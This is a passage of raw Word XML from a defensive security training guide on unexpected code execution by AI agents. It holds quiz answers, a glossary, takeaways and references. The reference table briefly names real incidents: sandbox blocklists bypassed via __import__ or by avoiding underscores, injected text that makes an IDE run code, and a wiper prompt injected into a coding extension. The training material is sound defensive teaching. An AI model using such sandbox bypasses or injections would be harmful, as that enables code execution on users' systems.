      </w:r>
      <w:r>
        <w:t xml:space="preserve">Knowledge check and discussion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Slide 20</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Q1. Your agent runs code but "only for internal analysis." Safe?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">No.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">If untrusted data reaches the code, internal analysis becomes RCE. Sandbox and allowlist regardless of intent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Q2. Why is unsandboxed code execution rated critical?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">It collapses every boundary.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">RCE on the worker reaches data, tools, memory, and other agents at once.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Q3. Safest way to run a shell command from an agent?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Parameterised argument arrays, no shell string concatenation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, inside a sandbox with an allowlist of commands.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="39" w:name="take-it-back-to-your-own-systems"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Take it back to your own systems</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Close the session with these. They convert the module into action items:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1010"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Where does agent-generated or agent-triggered code execute today, and as which user?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1010"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Can that environment reach the internet or our internal network?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1010"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If it spawned a shell right now, would we see it in logs?</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="39"/>
    <w:bookmarkEnd w:id="40"/>
    <w:bookmarkStart w:id="41" w:name="glossary"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">17 ·</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Glossary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Meaning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RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Remote Code Execution — running attacker-chosen code on your system.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Sandbox</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">An isolated environment that limits what executed code can access.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eval/exec</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Language features that run a string as code; dangerous on untrusted input.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Command injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Injecting extra shell commands via unsanitised arguments.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Least privilege</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Running with the minimum permissions the task needs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="41"/>
    <w:bookmarkStart w:id="42" w:name="key-takeaways"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">18 ·</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Key takeaways</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Slide 22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Code-capable agents turn data into RCE.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">One poisoned input can own the host.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Sandbox every execution.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Ephemeral, network-less, least-privilege, capped.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Never eval untrusted input.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Parameterise commands; allowlist grammar.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RCE collapses all boundaries.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Contain it before it reaches everything else.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="42"/>
    <w:bookmarkStart w:id="51" w:name="references-and-further-reading"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">19 ·</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">References and further reading</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Every link below was checked when this guide was produced. Share them freely — the point of citing sources is that your audience can verify the claims themselves.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="49" w:name="the-framework"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The framework</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="44" w:name="Xade85d22619c1cce8c740e05caaa5bb8897d95b"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OWASP Top 10 for Agentic Applications (2026)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OWASP GenAI Security Project · 2025-12-09</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The official framework this training is based on. Peer-reviewed with input from 100+ researchers and an Expert Review Board including NIST, the European Commission, and the Alan Turing Institute.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:hyperlink r:id="rId43">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">https://genai.owasp.org/resource/owasp-top-10-for-agentic-applications-for-2026/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="44"/>
    <w:bookmarkStart w:id="46" w:name="owasp-agentic-security-initiative"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OWASP Agentic Security Initiative</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OWASP GenAI Security Project · 2025</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Programme behind the framework; publishes the companion guides.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:hyperlink r:id="rId45">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">https://genai.owasp.org/initiatives/agentic-security-initiative/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="46"/>
    <w:bookmarkStart w:id="48" w:name="Xf952e95f228cfe39f6d5ace78fd5dd00e4f7f3b"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">deepteam — OWASP Top 10 for Agentic Applications reference</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Confident AI · 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Practitioner reference and red-teaming toolkit mapping to the framework.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:hyperlink r:id="rId47">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.trydeepteam.com/docs/frameworks-owasp-top-10-for-agentic-applications</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="48"/>
    <w:bookmarkEnd w:id="49"/>
    <w:bookmarkStart w:id="50" w:name="Xc642b18cba31bc6e2dddfe7ab743d5004a8f6b7"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Incidents and research cited in this guide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Link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LangChain LLMMathChain — LLM output passed to exec()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:hyperlink r:id="rId19">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">https://github.com/advisories/GHSA-fprp-p869-w6q2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LangChain PALChain — a blocklist 'sandbox' bypassed with __import__</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:hyperlink r:id="rId21">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">https://nvd.nist.gov/vuln/detail/CVE-2023-44467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LlamaIndex safe_eval — sanitiser defeated by avoiding underscores</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:hyperlink r:id="rId23">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">https://github.com/advisories/GHSA-r6gp-rff2-p3hf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CurXecute — injected text writes a config the IDE then executes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:hyperlink r:id="rId25">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">https://nvd.nist.gov/vuln/detail/CVE-2025-54135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Amazon Q Developer extension shipped with an injected wiper prompt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:hyperlink r:id="rId27">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">https://www.bleepingcomputer.com/news/security/amazon-ai-coding-agent-hacked-to-inject-data-wiping-commands/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Citation.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">OWASP GenAI Security Project,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Top 10 for Agentic Applications (2026)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, risk ASI05:2026 — Unexpected Code Execution.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="50"/>
    <w:bookmarkEnd w:id="5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45" Target="https://genai.owasp.org/initiatives/agentic-security-initiative/" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId43" Target="https://genai.owasp.org/resource/owasp-top-10-for-agentic-applications-for-2026/" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId19" Target="https://github.com/advisories/GHSA-fprp-p869-w6q2" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId23" Target="https://github.com/advisories/GHSA-r6gp-rff2-p3hf" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId21" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-44467" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId25" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-54135" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId27" Target="https://www.bleepingcomputer.com/news/security/amazon-ai-coding-agent-hacked-to-inject-data-wiping-commands/" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId47" Target="https://www.trydeepteam.com/docs/frameworks-owasp-top-10-for-agentic-applicat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5" Target="https://genai.owasp.org/initiatives/agentic-security-initiative/" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId43" Target="https://genai.owasp.org/resource/owasp-top-10-for-agentic-applications-for-2026/" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId19" Target="https://github.com/advisories/GHSA-fprp-p869-w6q2" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId23" Target="https://github.com/advisories/GHSA-r6gp-rff2-p3hf" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId21" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-44467" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId25" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-54135" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId27" Target="https://www.bleepingcomputer.com/news/security/amazon-ai-coding-agent-hacked-to-inject-data-wiping-commands/" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId47" Target="https://www.trydeepteam.com/docs/frameworks-owasp-top-10-for-agentic-applicat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asi05-unexpected-code-execution</dc:title>
  <dc:creator/>
  <cp:keywords/>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-08-08T13:09:40Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-08-08T13:09:40Z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